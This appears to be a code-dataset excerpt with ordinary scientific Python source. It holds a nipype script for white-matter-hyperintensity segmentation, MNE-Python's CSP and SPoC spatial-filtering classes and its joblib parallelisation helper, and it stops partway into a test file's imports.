metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "0rC0/WMHpypes",
"score": 2
} |
#### File: WMHpypes/scripts/segment_wmh.py
```python
import sys, os, importlib
import argparse
import glob
#sys.path.append(os.path.abspath('../'))
from wmhpypes.interfaces import ibbmTum
from wmhpypes.workflows import ibbmTum_wf
from nipype.pipeline.engine import Workflow, Node
from nipype import DataGrabber, DataSink, IdentityInterface, MapNode, JoinNode
from nipype.interfaces.io import BIDSDataGrabber, DataFinder
def make_workflow():
flairs = [os.path.abspath(i) for i in glob.glob(args.flair)]
weights = [os.path.abspath(i) for i in glob.glob(args.weights)]
weights_source = Node(interface=IdentityInterface(fields=['weights']), name='weights_source')
weights_source.inputs.weights = weights
data_source = Node(IdentityInterface(fields=['flairs']), name='data_source')
data_source.iterables = ('flairs', flairs)
sink = Node(interface=DataSink(), name = 'sink')
sink.inputs.base_directory = wmh_dir
sink.inputs.substitutions = [('_flairs_',''),
('_FLAIR.nii.gz/', '/'),]
sink.inputs.regexp_substitutions = [('\.\..*\.\.', ''),]
test_wf = ibbmTum_wf.get_test_wf(row_st=192,
cols_st=192,
thres_mask=10)
wmh = Workflow(name='wmh', base_dir=wf_temp)
wmh.connect(weights_source, 'weights', test_wf, 'inputspec.weights')
wmh.connect(data_source, 'flairs', test_wf, 'inputspec.flair')
wmh.connect(test_wf, 'outputspec.wmh_mask', sink, '@pred')
return wmh
def make_dirs():
global wf_temp, wmh_dir
if not os.path.isdir(args.outdir):
os.makedirs(args.outdir)
wf_temp = os.path.abspath(os.path.join(args.outdir, 'wmh_temp'))
wmh_dir = os.path.abspath(os.path.join(args.outdir, 'wmh'))
if not os.path.isdir(wf_temp):
os.makedirs(wf_temp)
if not os.path.isdir(wmh_dir):
os.makedirs(wmh_dir)
def main():
print(os.getcwd())
make_dirs()
wmh = make_workflow()
#wmh.write_graph(graph2use='colored')
#Image('./wf_work_dir/wmh/graph.png', width=200)
wmh.run() #Single thread
#plugin_args = {'n_procs': cores}
#wmh.run(plugin='MultiProc', plugin_args=plugin_args)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('-f','--flair', type=str, required=True)
# parser.add_argument('-m','--mprage', type=str, required=False) # ToDo MPRage
parser.add_argument('-w','--weights', type=str, required=True)
parser.add_argument('-o','--outdir', type=str, required=True)
parser.add_argument('-i','--indir', type=str, required=False, default='')
args = parser.parse_args()
main()
``` |
{
"source": "0reza/mne-python",
"score": 3
} |
#### File: mne/decoding/csp.py
```python
import copy as cp
import numpy as np
from .base import BaseEstimator
from .mixin import TransformerMixin
from ..cov import _regularized_covariance
from ..defaults import _INTERPOLATION_DEFAULT
from ..fixes import pinv
from ..utils import fill_doc, _check_option, _validate_type, copy_doc
@fill_doc
class CSP(TransformerMixin, BaseEstimator):
"""M/EEG signal decomposition using the Common Spatial Patterns (CSP).
This class can be used as a supervised decomposition to estimate spatial
filters for feature extraction. CSP in the context of EEG was first
described in :footcite:`KolesEtAl1990`; a comprehensive tutorial on CSP can
be found in :footcite:`BlankertzEtAl2008`. Multi-class solving is
implemented from :footcite:`Grosse-WentrupBuss2008`.
Parameters
----------
n_components : int (default 4)
The number of components to decompose M/EEG signals. This number should
be set by cross-validation.
reg : float | str | None (default None)
If not None (same as ``'empirical'``, default), allow regularization
for covariance estimation. If float (between 0 and 1), shrinkage is
used. For str values, ``reg`` will be passed as ``method`` to
:func:`mne.compute_covariance`.
log : None | bool (default None)
If ``transform_into`` equals ``'average_power'`` and ``log`` is None or
True, then apply a log transform to standardize features, else features
are z-scored. If ``transform_into`` is ``'csp_space'``, ``log`` must be
None.
cov_est : 'concat' | 'epoch' (default 'concat')
If ``'concat'``, covariance matrices are estimated on concatenated
epochs for each class. If ``'epoch'``, covariance matrices are
estimated on each epoch separately and then averaged over each class.
transform_into : 'average_power' | 'csp_space' (default 'average_power')
If 'average_power' then ``self.transform`` will return the average
power of each spatial filter. If ``'csp_space'``, ``self.transform``
will return the data in CSP space.
norm_trace : bool (default False)
Normalize class covariance by its trace. Trace normalization is a step
of the original CSP algorithm :footcite:`KolesEtAl1990` to eliminate
magnitude variations in the EEG between individuals. It is not applied
in more recent work :footcite:`BlankertzEtAl2008`,
:footcite:`Grosse-WentrupBuss2008` and can have a negative impact on
pattern order.
cov_method_params : dict | None
Parameters to pass to :func:`mne.compute_covariance`.
.. versionadded:: 0.16
%(rank_none)s
.. versionadded:: 0.17
component_order : 'mutual_info' | 'alternate' (default 'mutual_info')
If ``'mutual_info'`` order components by decreasing mutual information
(in the two-class case this uses a simplification which orders
components by decreasing absolute deviation of the eigenvalues from 0.5
:footcite:`BarachantEtAl2010`). For the two-class case, ``'alternate'``
orders components by starting with the largest eigenvalue, followed by
the smallest, the second-to-largest, the second-to-smallest, and so on
:footcite:`BlankertzEtAl2008`.
.. versionadded:: 0.21
Attributes
----------
filters_ : ndarray, shape (n_channels, n_channels)
If fit, the CSP components used to decompose the data, else None.
patterns_ : ndarray, shape (n_channels, n_channels)
If fit, the CSP patterns used to restore M/EEG signals, else None.
mean_ : ndarray, shape (n_components,)
If fit, the mean squared power for each component.
std_ : ndarray, shape (n_components,)
If fit, the std squared power for each component.
See Also
--------
mne.preprocessing.Xdawn, SPoC
References
----------
.. footbibliography::
"""
def __init__(self, n_components=4, reg=None, log=None, cov_est='concat',
transform_into='average_power', norm_trace=False,
cov_method_params=None, rank=None,
component_order='mutual_info'):
# Init default CSP
if not isinstance(n_components, int):
raise ValueError('n_components must be an integer.')
self.n_components = n_components
self.rank = rank
self.reg = reg
# Init default cov_est
if not (cov_est == "concat" or cov_est == "epoch"):
raise ValueError("unknown covariance estimation method")
self.cov_est = cov_est
# Init default transform_into
self.transform_into = _check_option('transform_into', transform_into,
['average_power', 'csp_space'])
# Init default log
if transform_into == 'average_power':
if log is not None and not isinstance(log, bool):
raise ValueError('log must be a boolean if transform_into == '
'"average_power".')
else:
if log is not None:
raise ValueError('log must be a None if transform_into == '
'"csp_space".')
self.log = log
_validate_type(norm_trace, bool, 'norm_trace')
self.norm_trace = norm_trace
self.cov_method_params = cov_method_params
self.component_order = _check_option('component_order',
component_order,
('mutual_info', 'alternate'))
def _check_Xy(self, X, y=None):
"""Check input data."""
if not isinstance(X, np.ndarray):
raise ValueError("X should be of type ndarray (got %s)."
% type(X))
if y is not None:
if len(X) != len(y) or len(y) < 1:
raise ValueError('X and y must have the same length.')
if X.ndim < 3:
raise ValueError('X must have at least 3 dimensions.')
def fit(self, X, y):
"""Estimate the CSP decomposition on epochs.
Parameters
----------
X : ndarray, shape (n_epochs, n_channels, n_times)
The data on which to estimate the CSP.
y : array, shape (n_epochs,)
The class for each epoch.
Returns
-------
self : instance of CSP
Returns the modified instance.
"""
self._check_Xy(X, y)
self._classes = np.unique(y)
n_classes = len(self._classes)
if n_classes < 2:
raise ValueError("n_classes must be >= 2.")
if n_classes > 2 and self.component_order == 'alternate':
raise ValueError("component_order='alternate' requires two "
"classes, but data contains {} classes; use "
"component_order='mutual_info' "
"instead.".format(n_classes))
covs, sample_weights = self._compute_covariance_matrices(X, y)
eigen_vectors, eigen_values = self._decompose_covs(covs,
sample_weights)
ix = self._order_components(covs, sample_weights, eigen_vectors,
eigen_values, self.component_order)
eigen_vectors = eigen_vectors[:, ix]
self.filters_ = eigen_vectors.T
self.patterns_ = pinv(eigen_vectors)
pick_filters = self.filters_[:self.n_components]
X = np.asarray([np.dot(pick_filters, epoch) for epoch in X])
# compute features (mean power)
X = (X ** 2).mean(axis=2)
# To standardize features
self.mean_ = X.mean(axis=0)
self.std_ = X.std(axis=0)
return self
def transform(self, X):
"""Estimate epochs sources given the CSP filters.
Parameters
----------
X : array, shape (n_epochs, n_channels, n_times)
The data.
Returns
-------
X : ndarray
If self.transform_into == 'average_power' then returns the power of
CSP features averaged over time and shape (n_epochs, n_sources)
If self.transform_into == 'csp_space' then returns the data in CSP
space and shape is (n_epochs, n_sources, n_times).
"""
if not isinstance(X, np.ndarray):
raise ValueError("X should be of type ndarray (got %s)." % type(X))
if self.filters_ is None:
raise RuntimeError('No filters available. Please first fit CSP '
'decomposition.')
pick_filters = self.filters_[:self.n_components]
X = np.asarray([np.dot(pick_filters, epoch) for epoch in X])
# compute features (mean band power)
if self.transform_into == 'average_power':
X = (X ** 2).mean(axis=2)
log = True if self.log is None else self.log
if log:
X = np.log(X)
else:
X -= self.mean_
X /= self.std_
return X
@copy_doc(TransformerMixin.fit_transform)
def fit_transform(self, X, y, **fit_params): # noqa: D102
return super().fit_transform(X, y=y, **fit_params)
@fill_doc
def plot_patterns(self, info, components=None, ch_type=None,
vmin=None, vmax=None, cmap='RdBu_r', sensors=True,
colorbar=True, scalings=None, units='a.u.', res=64,
size=1, cbar_fmt='%3.1f', name_format='CSP%01d',
show=True, show_names=False, title=None, mask=None,
mask_params=None, outlines='head', contours=6,
image_interp=_INTERPOLATION_DEFAULT, average=None,
sphere=None):
"""Plot topographic patterns of components.
The patterns explain how the measured data was generated from the
neural sources (a.k.a. the forward model).
Parameters
----------
%(info_not_none)s Used for fitting. If not available, consider using
:func:`mne.create_info`.
components : float | array of float | None
The patterns to plot. If None, n_components will be shown.
ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None
The channel type to plot. For 'grad', the gradiometers are
collected in pairs and the RMS for each pair is plotted.
If None, then first available channel type from order given
above is used. Defaults to None.
vmin : float | callable
The value specifying the lower bound of the color range.
If None, and vmax is None, -vmax is used. Else np.min(data).
If callable, the output equals vmin(data).
vmax : float | callable
The value specifying the upper bound of the color range.
If None, the maximum absolute value is used. If vmin is None,
but vmax is not, default np.min(data).
If callable, the output equals vmax(data).
cmap : matplotlib colormap | (colormap, bool) | 'interactive' | None
Colormap to use. If tuple, the first value indicates the colormap
to use and the second value is a boolean defining interactivity. In
interactive mode the colors are adjustable by clicking and dragging
the colorbar with left and right mouse button. Left mouse button
moves the scale up and down and right mouse button adjusts the
range. Hitting space bar resets the range. Up and down arrows can
be used to change the colormap. If None, 'Reds' is used for all
positive data, otherwise defaults to 'RdBu_r'. If 'interactive',
translates to (None, True). Defaults to 'RdBu_r'.
.. warning:: Interactive mode works smoothly only for a small
amount of topomaps.
sensors : bool | str
Add markers for sensor locations to the plot. Accepts matplotlib
plot format string (e.g., 'r+' for red plusses). If True,
a circle will be used (via .add_artist). Defaults to True.
colorbar : bool
Plot a colorbar.
scalings : dict | float | None
The scalings of the channel types to be applied for plotting.
If None, defaults to ``dict(eeg=1e6, grad=1e13, mag=1e15)``.
units : dict | str | None
The unit of the channel type used for colorbar label. If
scale is None the unit is automatically determined.
res : int
The resolution of the topomap image (n pixels along each side).
size : float
Side length per topomap in inches.
cbar_fmt : str
String format for colorbar values.
name_format : str
String format for topomap values. Defaults to "CSP%%01d".
show : bool
Show figure if True.
show_names : bool | callable
If True, show channel names on top of the map. If a callable is
passed, channel names will be formatted using the callable; e.g.,
to delete the prefix 'MEG ' from all channel names, pass the
function lambda x: x.replace('MEG ', ''). If ``mask`` is not None,
only significant sensors will be shown.
title : str | None
Title. If None (default), no title is displayed.
%(mask_patterns_topomap)s
%(mask_params_topomap)s
%(outlines_topomap)s
contours : int | array of float
The number of contour lines to draw. If 0, no contours will be
drawn. When an integer, matplotlib ticker locator is used to find
suitable values for the contour thresholds (may sometimes be
inaccurate, use array for accuracy). If an array, the values
represent the levels for the contours. Defaults to 6.
%(image_interp_topomap)s
average : float | None
The time window around a given time to be used for averaging
(seconds). For example, 0.01 would translate into window that
starts 5 ms before and ends 5 ms after a given time point.
Defaults to None, which means no averaging.
%(sphere_topomap_auto)s
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
"""
from .. import EvokedArray
if components is None:
components = np.arange(self.n_components)
# set sampling frequency to have 1 component per time point
info = cp.deepcopy(info)
with info._unlock():
info['sfreq'] = 1.
# create an evoked
patterns = EvokedArray(self.patterns_.T, info, tmin=0)
# the call plot_topomap
return patterns.plot_topomap(
times=components, ch_type=ch_type,
vmin=vmin, vmax=vmax, cmap=cmap, colorbar=colorbar, res=res,
cbar_fmt=cbar_fmt, sensors=sensors,
scalings=scalings, units=units, time_unit='s',
time_format=name_format, size=size, show_names=show_names,
title=title, mask_params=mask_params, mask=mask, outlines=outlines,
contours=contours, image_interp=image_interp, show=show,
average=average, sphere=sphere)
@fill_doc
def plot_filters(self, info, components=None, ch_type=None,
vmin=None, vmax=None, cmap='RdBu_r', sensors=True,
colorbar=True, scalings=None, units='a.u.', res=64,
size=1, cbar_fmt='%3.1f', name_format='CSP%01d',
show=True, show_names=False, title=None, mask=None,
mask_params=None, outlines='head', contours=6,
image_interp=_INTERPOLATION_DEFAULT, average=None):
"""Plot topographic filters of components.
The filters are used to extract discriminant neural sources from
the measured data (a.k.a. the backward model).
Parameters
----------
%(info_not_none)s Used for fitting. If not available, consider using
:func:`mne.create_info`.
components : float | array of float | None
The patterns to plot. If None, n_components will be shown.
ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None
The channel type to plot. For 'grad', the gradiometers are
collected in pairs and the RMS for each pair is plotted.
If None, then first available channel type from order given
above is used. Defaults to None.
vmin : float | callable
The value specifying the lower bound of the color range.
If None, and vmax is None, -vmax is used. Else np.min(data).
If callable, the output equals vmin(data).
vmax : float | callable
The value specifying the upper bound of the color range.
If None, the maximum absolute value is used. If vmin is None,
but vmax is not, defaults to np.min(data).
If callable, the output equals vmax(data).
cmap : matplotlib colormap | (colormap, bool) | 'interactive' | None
Colormap to use. If tuple, the first value indicates the colormap
to use and the second value is a boolean defining interactivity. In
interactive mode the colors are adjustable by clicking and dragging
the colorbar with left and right mouse button. Left mouse button
moves the scale up and down and right mouse button adjusts the
range. Hitting space bar resets the range. Up and down arrows can
be used to change the colormap. If None, 'Reds' is used for all
positive data, otherwise defaults to 'RdBu_r'. If 'interactive',
translates to (None, True). Defaults to 'RdBu_r'.
.. warning:: Interactive mode works smoothly only for a small
amount of topomaps.
sensors : bool | str
Add markers for sensor locations to the plot. Accepts matplotlib
plot format string (e.g., 'r+' for red plusses). If True,
a circle will be used (via .add_artist). Defaults to True.
colorbar : bool
Plot a colorbar.
scalings : dict | float | None
The scalings of the channel types to be applied for plotting.
If None, defaults to ``dict(eeg=1e6, grad=1e13, mag=1e15)``.
units : dict | str | None
The unit of the channel type used for colorbar label. If
scale is None the unit is automatically determined.
res : int
The resolution of the topomap image (n pixels along each side).
size : float
Side length per topomap in inches.
cbar_fmt : str
String format for colorbar values.
name_format : str
String format for topomap values. Defaults to "CSP%%01d".
show : bool
Show figure if True.
show_names : bool | callable
If True, show channel names on top of the map. If a callable is
passed, channel names will be formatted using the callable; e.g.,
to delete the prefix 'MEG ' from all channel names, pass the
function lambda x: x.replace('MEG ', ''). If ``mask`` is not None,
only significant sensors will be shown.
title : str | None
Title. If None (default), no title is displayed.
mask : ndarray of bool, shape (n_channels, n_times) | None
The channels to be marked as significant at a given time point.
Indices set to `True` will be considered. Defaults to None.
mask_params : dict | None
Additional plotting parameters for plotting significant sensors.
Default (None) equals::
dict(marker='o', markerfacecolor='w', markeredgecolor='k',
linewidth=0, markersize=4)
%(outlines_topomap)s
contours : int | array of float
The number of contour lines to draw. If 0, no contours will be
drawn. When an integer, matplotlib ticker locator is used to find
suitable values for the contour thresholds (may sometimes be
inaccurate, use array for accuracy). If an array, the values
represent the levels for the contours. Defaults to 6.
%(image_interp_topomap)s
average : float | None
The time window around a given time to be used for averaging
(seconds). For example, 0.01 would translate into window that
starts 5 ms before and ends 5 ms after a given time point.
Defaults to None, which means no averaging.
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
"""
from .. import EvokedArray
if components is None:
components = np.arange(self.n_components)
# set sampling frequency to have 1 component per time point
info = cp.deepcopy(info)
with info._unlock():
info['sfreq'] = 1.
# create an evoked
filters = EvokedArray(self.filters_.T, info, tmin=0)
# the call plot_topomap
return filters.plot_topomap(
times=components, ch_type=ch_type, vmin=vmin,
vmax=vmax, cmap=cmap, colorbar=colorbar, res=res,
cbar_fmt=cbar_fmt, sensors=sensors, scalings=scalings, units=units,
time_unit='s', time_format=name_format, size=size,
show_names=show_names, title=title, mask_params=mask_params,
mask=mask, outlines=outlines, contours=contours,
image_interp=image_interp, show=show, average=average)
def _compute_covariance_matrices(self, X, y):
_, n_channels, _ = X.shape
if self.cov_est == "concat":
cov_estimator = self._concat_cov
elif self.cov_est == "epoch":
cov_estimator = self._epoch_cov
covs = []
sample_weights = []
for this_class in self._classes:
cov, weight = cov_estimator(X[y == this_class])
if self.norm_trace:
cov /= np.trace(cov)
covs.append(cov)
sample_weights.append(weight)
return np.stack(covs), np.array(sample_weights)
def _concat_cov(self, x_class):
"""Concatenate epochs before computing the covariance."""
_, n_channels, _ = x_class.shape
x_class = np.transpose(x_class, [1, 0, 2])
x_class = x_class.reshape(n_channels, -1)
cov = _regularized_covariance(
x_class, reg=self.reg, method_params=self.cov_method_params,
rank=self.rank)
weight = x_class.shape[0]
return cov, weight
def _epoch_cov(self, x_class):
"""Mean of per-epoch covariances."""
cov = sum(_regularized_covariance(
this_X, reg=self.reg,
method_params=self.cov_method_params,
rank=self.rank) for this_X in x_class)
cov /= len(x_class)
weight = len(x_class)
return cov, weight
def _decompose_covs(self, covs, sample_weights):
from scipy import linalg
n_classes = len(covs)
if n_classes == 2:
eigen_values, eigen_vectors = linalg.eigh(covs[0], covs.sum(0))
else:
# The multiclass case is adapted from
# http://github.com/alexandrebarachant/pyRiemann
eigen_vectors, D = _ajd_pham(covs)
eigen_vectors = self._normalize_eigenvectors(eigen_vectors.T, covs,
sample_weights)
eigen_values = None
return eigen_vectors, eigen_values
def _compute_mutual_info(self, covs, sample_weights, eigen_vectors):
class_probas = sample_weights / sample_weights.sum()
mutual_info = []
for jj in range(eigen_vectors.shape[1]):
aa, bb = 0, 0
for (cov, prob) in zip(covs, class_probas):
tmp = np.dot(np.dot(eigen_vectors[:, jj].T, cov),
eigen_vectors[:, jj])
aa += prob * np.log(np.sqrt(tmp))
bb += prob * (tmp ** 2 - 1)
mi = - (aa + (3.0 / 16) * (bb ** 2))
mutual_info.append(mi)
return mutual_info
def _normalize_eigenvectors(self, eigen_vectors, covs, sample_weights):
# Here we apply an euclidean mean. See pyRiemann for other metrics
mean_cov = np.average(covs, axis=0, weights=sample_weights)
for ii in range(eigen_vectors.shape[1]):
tmp = np.dot(np.dot(eigen_vectors[:, ii].T, mean_cov),
eigen_vectors[:, ii])
eigen_vectors[:, ii] /= np.sqrt(tmp)
return eigen_vectors
def _order_components(self, covs, sample_weights, eigen_vectors,
eigen_values, component_order):
n_classes = len(self._classes)
if component_order == 'mutual_info' and n_classes > 2:
mutual_info = self._compute_mutual_info(covs, sample_weights,
eigen_vectors)
ix = np.argsort(mutual_info)[::-1]
elif component_order == 'mutual_info' and n_classes == 2:
ix = np.argsort(np.abs(eigen_values - 0.5))[::-1]
elif component_order == 'alternate' and n_classes == 2:
i = np.argsort(eigen_values)
ix = np.empty_like(i)
ix[1::2] = i[:len(i) // 2]
ix[0::2] = i[len(i) // 2:][::-1]
return ix
def _ajd_pham(X, eps=1e-6, max_iter=15):
"""Approximate joint diagonalization based on Pham's algorithm.
This is a direct implementation of the PHAM's AJD algorithm [1].
Parameters
----------
X : ndarray, shape (n_epochs, n_channels, n_channels)
A set of covariance matrices to diagonalize.
eps : float, default 1e-6
The tolerance for stopping criterion.
max_iter : int, default 1000
The maximum number of iteration to reach convergence.
Returns
-------
V : ndarray, shape (n_channels, n_channels)
The diagonalizer.
D : ndarray, shape (n_epochs, n_channels, n_channels)
The set of quasi diagonal matrices.
References
----------
.. [1] Pham, <NAME>. "Joint approximate diagonalization of positive
definite Hermitian matrices." SIAM Journal on Matrix Analysis and
Applications 22, no. 4 (2001): 1136-1152.
"""
# Adapted from http://github.com/alexandrebarachant/pyRiemann
n_epochs = X.shape[0]
# Reshape input matrix
A = np.concatenate(X, axis=0).T
# Init variables
n_times, n_m = A.shape
V = np.eye(n_times)
epsilon = n_times * (n_times - 1) * eps
for it in range(max_iter):
decr = 0
for ii in range(1, n_times):
for jj in range(ii):
Ii = np.arange(ii, n_m, n_times)
Ij = np.arange(jj, n_m, n_times)
c1 = A[ii, Ii]
c2 = A[jj, Ij]
g12 = np.mean(A[ii, Ij] / c1)
g21 = np.mean(A[ii, Ij] / c2)
omega21 = np.mean(c1 / c2)
omega12 = np.mean(c2 / c1)
omega = np.sqrt(omega12 * omega21)
tmp = np.sqrt(omega21 / omega12)
tmp1 = (tmp * g12 + g21) / (omega + 1)
tmp2 = (tmp * g12 - g21) / max(omega - 1, 1e-9)
h12 = tmp1 + tmp2
h21 = np.conj((tmp1 - tmp2) / tmp)
decr += n_epochs * (g12 * np.conj(h12) + g21 * h21) / 2.0
tmp = 1 + 1.j * 0.5 * np.imag(h12 * h21)
tmp = np.real(tmp + np.sqrt(tmp ** 2 - h12 * h21))
tau = np.array([[1, -h12 / tmp], [-h21 / tmp, 1]])
A[[ii, jj], :] = np.dot(tau, A[[ii, jj], :])
tmp = np.c_[A[:, Ii], A[:, Ij]]
tmp = np.reshape(tmp, (n_times * n_epochs, 2), order='F')
tmp = np.dot(tmp, tau.T)
tmp = np.reshape(tmp, (n_times, n_epochs * 2), order='F')
A[:, Ii] = tmp[:, :n_epochs]
A[:, Ij] = tmp[:, n_epochs:]
V[[ii, jj], :] = np.dot(tau, V[[ii, jj], :])
if decr < epsilon:
break
D = np.reshape(A, (n_times, -1, n_times)).transpose(1, 0, 2)
return V, D
@fill_doc
class SPoC(CSP):
"""Implementation of the SPoC spatial filtering.
Source Power Comodulation (SPoC) :footcite:`DahneEtAl2014` allows to
extract spatial filters and
patterns by using a target (continuous) variable in the decomposition
process in order to give preference to components whose power correlates
with the target variable.
SPoC can be seen as an extension of the CSP driven by a continuous
variable rather than a discrete variable. Typical applications include
extraction of motor patterns using EMG power or audio patterns using sound
envelope.
Parameters
----------
n_components : int
The number of components to decompose M/EEG signals.
reg : float | str | None (default None)
If not None (same as ``'empirical'``, default), allow
regularization for covariance estimation.
If float, shrinkage is used (0 <= shrinkage <= 1).
For str options, ``reg`` will be passed to ``method`` to
:func:`mne.compute_covariance`.
log : None | bool (default None)
If transform_into == 'average_power' and log is None or True, then
applies a log transform to standardize the features, else the features
are z-scored. If transform_into == 'csp_space', then log must be None.
transform_into : {'average_power', 'csp_space'}
If 'average_power' then self.transform will return the average power of
each spatial filter. If 'csp_space' self.transform will return the data
in CSP space. Defaults to 'average_power'.
cov_method_params : dict | None
Parameters to pass to :func:`mne.compute_covariance`.
.. versionadded:: 0.16
%(rank_none)s
.. versionadded:: 0.17
Attributes
----------
filters_ : ndarray, shape (n_channels, n_channels)
If fit, the SPoC spatial filters, else None.
patterns_ : ndarray, shape (n_channels, n_channels)
If fit, the SPoC spatial patterns, else None.
mean_ : ndarray, shape (n_components,)
If fit, the mean squared power for each component.
std_ : ndarray, shape (n_components,)
If fit, the std squared power for each component.
See Also
--------
mne.preprocessing.Xdawn, CSP
References
----------
.. footbibliography::
"""
def __init__(self, n_components=4, reg=None, log=None,
transform_into='average_power', cov_method_params=None,
rank=None):
"""Init of SPoC."""
super(SPoC, self).__init__(n_components=n_components, reg=reg, log=log,
cov_est="epoch", norm_trace=False,
transform_into=transform_into, rank=rank,
cov_method_params=cov_method_params)
# Covariance estimation have to be done on the single epoch level,
# unlike CSP where covariance estimation can also be achieved through
# concatenation of all epochs from the same class.
delattr(self, 'cov_est')
delattr(self, 'norm_trace')
def fit(self, X, y):
"""Estimate the SPoC decomposition on epochs.
Parameters
----------
X : ndarray, shape (n_epochs, n_channels, n_times)
The data on which to estimate the SPoC.
y : array, shape (n_epochs,)
The class for each epoch.
Returns
-------
self : instance of SPoC
Returns the modified instance.
"""
from scipy import linalg
self._check_Xy(X, y)
if len(np.unique(y)) < 2:
raise ValueError("y must have at least two distinct values.")
# The following code is directly copied from pyRiemann
# Normalize target variable
target = y.astype(np.float64)
target -= target.mean()
target /= target.std()
n_epochs, n_channels = X.shape[:2]
# Estimate single trial covariance
covs = np.empty((n_epochs, n_channels, n_channels))
for ii, epoch in enumerate(X):
covs[ii] = _regularized_covariance(
epoch, reg=self.reg, method_params=self.cov_method_params,
rank=self.rank)
C = covs.mean(0)
Cz = np.mean(covs * target[:, np.newaxis, np.newaxis], axis=0)
# solve eigenvalue decomposition
evals, evecs = linalg.eigh(Cz, C)
evals = evals.real
evecs = evecs.real
# sort vectors
ix = np.argsort(np.abs(evals))[::-1]
# sort eigenvectors
evecs = evecs[:, ix].T
# spatial patterns
self.patterns_ = linalg.pinv(evecs).T # n_channels x n_channels
self.filters_ = evecs # n_channels x n_channels
pick_filters = self.filters_[:self.n_components]
X = np.asarray([np.dot(pick_filters, epoch) for epoch in X])
# compute features (mean band power)
X = (X ** 2).mean(axis=-1)
# To standardize features
self.mean_ = X.mean(axis=0)
self.std_ = X.std(axis=0)
return self
def transform(self, X):
"""Estimate epochs sources given the SPoC filters.
Parameters
----------
X : array, shape (n_epochs, n_channels, n_times)
The data.
Returns
-------
X : ndarray
If self.transform_into == 'average_power' then returns the power of
CSP features averaged over time and shape (n_epochs, n_sources)
If self.transform_into == 'csp_space' then returns the data in CSP
space and shape is (n_epochs, n_sources, n_times).
"""
return super(SPoC, self).transform(X)
```
#### File: mne-python/mne/parallel.py
```python
import logging
import multiprocessing
import os
from . import get_config
from .utils import (logger, verbose, warn, ProgressBar, _validate_type,
_check_option, _ensure_int, deprecated)
@verbose
def parallel_func(func, n_jobs, max_nbytes='auto', pre_dispatch='n_jobs',
total=None, prefer=None, *, max_jobs=None, verbose=None):
"""Return parallel instance with delayed function.
Util function to use joblib only if available
Parameters
----------
func : callable
A function.
%(n_jobs)s
max_nbytes : int, str, or None
Threshold on the minimum size of arrays passed to the workers that
triggers automated memory mapping. Can be an int in Bytes,
or a human-readable string, e.g., '1M' for 1 megabyte.
Use None to disable memmaping of large arrays. Use 'auto' to
use the value set using mne.set_memmap_min_size.
pre_dispatch : int, or str, optional
See :class:`joblib.Parallel`.
total : int | None
If int, use a progress bar to display the progress of dispatched
jobs. This should only be used when directly iterating, not when
using ``split_list`` or :func:`np.array_split`.
If None (default), do not add a progress bar.
prefer : str | None
If str, can be "processes" or "threads". See :class:`joblib.Parallel`.
.. versionadded:: 0.18
max_jobs : int | None
The upper limit of jobs to use. This is useful when you know ahead
of a the maximum number of calls into :class:`joblib.Parallel` that
you will possibly want or need, and the returned ``n_jobs`` should not
exceed this value regardless of how many jobs the user requests.
%(verbose)s INFO or DEBUG
will print parallel status, others will not.
Returns
-------
parallel: instance of joblib.Parallel or list
The parallel object.
my_func: callable
``func`` if not parallel or delayed(func).
n_jobs: int
Number of jobs >= 1.
"""
should_print = (logger.level <= logging.INFO)
# for a single job, we don't need joblib
_validate_type(n_jobs, ('int-like', None))
if n_jobs != 1:
try:
from joblib import Parallel, delayed
except ImportError:
if n_jobs is not None:
warn('joblib not installed. Cannot run in parallel.')
n_jobs = 1
if n_jobs == 1:
n_jobs = 1
my_func = func
parallel = list
else:
# check if joblib is recent enough to support memmaping
cache_dir = get_config('MNE_CACHE_DIR', None)
if isinstance(max_nbytes, str) and max_nbytes == 'auto':
max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None)
if max_nbytes is not None and cache_dir is None:
logger.info(
'joblib supports memapping pool but "MNE_CACHE_DIR" '
'is not set in MNE-Python config. To enable it, use, '
'e.g., mne.set_cache_dir(\'/tmp/shm\'). This will '
'store temporary files under /dev/shm and can result '
'in large memory savings.')
# create keyword arguments for Parallel
kwargs = {'verbose': 5 if should_print and total is None else 0}
kwargs['pre_dispatch'] = pre_dispatch
kwargs['prefer'] = prefer
if cache_dir is None:
max_nbytes = None # disable memmaping
kwargs['temp_folder'] = cache_dir
kwargs['max_nbytes'] = max_nbytes
parallel = Parallel(n_jobs, **kwargs)
n_jobs = _check_n_jobs(parallel.n_jobs)
if max_jobs is not None:
n_jobs = min(n_jobs, max(_ensure_int(max_jobs, 'max_jobs'), 1))
my_func = delayed(func)
if total is not None:
def parallel_progress(op_iter):
return parallel(ProgressBar(iterable=op_iter, max_value=total))
parallel_out = parallel_progress
else:
parallel_out = parallel
return parallel_out, my_func, n_jobs
# this isn't really meant to be public but it's easy enough to deprecate
@deprecated('check_n_jobs is deprecated and will be removed in 1.1, use '
'parallel_func directly')
def check_n_jobs(n_jobs, allow_cuda=False):
"""Check n_jobs in particular for negative values.
Parameters
----------
n_jobs : int
The number of jobs.
allow_cuda : bool
Allow n_jobs to be 'cuda'. Default: False.
Returns
-------
n_jobs : int
The checked number of jobs. Always positive (or 'cuda' if
applicable).
"""
types = ('int-like', None)
if allow_cuda:
types = types + ('str',)
_validate_type(n_jobs, types, 'n_jobs')
if isinstance(n_jobs, str):
# We can only be in this path if allow_cuda
_check_option('n_jobs', n_jobs, ('cuda',), extra='when str')
return 'cuda' # return 'cuda'
return _check_n_jobs(n_jobs)
def _check_n_jobs(n_jobs):
n_jobs = _ensure_int(n_jobs, 'n_jobs', must_be='an int or None')
if os.getenv('MNE_FORCE_SERIAL', '').lower() in ('true', '1') and \
n_jobs != 1:
n_jobs = 1
logger.info('... MNE_FORCE_SERIAL set. Processing in forced '
'serial mode.')
elif n_jobs <= 0:
n_cores = multiprocessing.cpu_count()
n_jobs_orig = n_jobs
n_jobs = min(n_cores + n_jobs + 1, n_cores)
if n_jobs <= 0:
raise ValueError(
f'If n_jobs has a non-positive value ({n_jobs_orig}) it must '
f'not be less than the number of CPUs present ({n_cores})')
return n_jobs
```
#### File: mne/tests/test_parallel.py
```python
from contextlib import nullcontext
import multiprocessing
import os
import pytest
from mne.parallel import parallel_func
